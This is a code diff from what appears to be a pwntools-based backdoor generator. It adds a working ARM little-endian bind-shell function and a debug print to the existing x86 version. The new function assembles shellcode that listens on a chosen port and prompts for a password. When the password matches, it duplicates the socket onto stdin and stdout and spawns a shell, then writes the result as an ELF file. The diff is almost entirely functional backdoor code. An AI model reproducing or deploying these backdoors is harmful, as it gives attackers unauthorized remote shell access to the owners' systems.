@@ -1695,6 +1695,7 @@ def x86_bind_shell(listen_port, passwd, filename=None):
 	listen_port = '0x'+enhex(p16(listen_port))
 	passwd_len = hex(len(passwd))
 	passwd = "0x"+enhex(p32(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).rjust(16,"0")
+	print(passwd)
 	shellcode = '''
 	push 0x1
 	pop ebx
@@ -1800,8 +1801,88 @@ Armv7 bindshell backdoor file
 
 2022.10.26 updating more appear
 '''
-def armv7_bind_shell(listen_port, passwd, filename=None):
-	print("hahah_nihaodoudou")
+def armelv7_bind_shell(listen_port, passwd, filename=None):
+	context.arch = 'arm'
+	context.endian = 'little'
+	context.bits = '32'
+	log.success("bind port is set to "+ str(listen_port))
+	log.success("passwd is set to '%s'"%passwd )
+	listen_port = '0x'+enhex(p16(listen_port))
+	passwd_len = hex(len(passwd))
+	passwd = "0x"+enhex(p32(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).rjust(8,"0")
+	#print(passwd)
+	passwd_high = passwd[:6]
+	passwd_low  = "0x"+passwd[6:10]
+	shellcode = shellcraft.socket(2,1,0)
+	shellcode += '''
+	mov  r6, r0
+	movw r7, #2
+	movt r7, #%s
+	push {r2}
+	push {r7}
+	mov  r1,sp
+	mov  r2,#0x10  
+	movw r7, 0x11a
+	svc #0
+	mov r0,r6
+	eor r1,r1
+	movw r7,#284
+	svc #0
+	mov r0,r6
+	eor r2,r2
+	movw r7, 0x11d
+    svc #0
+    mov r6,r0
+	movw r7, #0x41414100 & 0xffff
+	movt r7, #0x41414100 >> 16
+	push {r7}
+	movw r7, #0x203a6477 & 0xffff
+	movt r7, #0x203a6477 >> 16
+	push {r7}
+	movw r7, #0x73736150 & 0xffff
+	movt r7, #0x73736150 >> 16
+	push {r7}
+	mov  r1, sp
+	mov  r0, r6
+	mov  r2, #8
+	/* call write() */
+	mov  r7, #SYS_write /* 4 */
+	svc  #0
+	sub  sp, 0x20
+	mov  r0, r6
+	mov  r1, sp
+	mov  r2, #%s
+	mov  r7, #3
+	svc  #0
+	mov  r7,sp
+	ldr  r7,[r7]
+	movw r5,#%s
+	movt r5,#%s
+	cmp  r7,r5
+	'''
+	shellcode = asm(shellcode % (listen_port, passwd_len ,passwd_low ,passwd_high))
+	shellcode += b"\x80\x00\x00\x1a"
+	shellcode_dump = '''
+	mov r1,#2
+	mov r0,r6
+	mov r7,#63
+	svc #0
+	sub r1, r1, #1
+	cmp r1,#0
+	'''
+	shellcode += asm(shellcode_dump) + b"\xF9\xFF\xFF\xaa"
+	shellcode += asm(shellcraft.sh())
+	data = make_elf(shellcode)
+	log.info("waiting 3s")
+	sleep(3)
+	if(filename==None):
+		f=open("./armelv7_bind_shell","wb")
+		f.write(data)
+		f.close()
+		log.success("armelv7_bind_shell is ok in current path ./")
+	context.arch = 'i386'
+	context.bits = "32"
+	context.endian = "little"
 
 
 
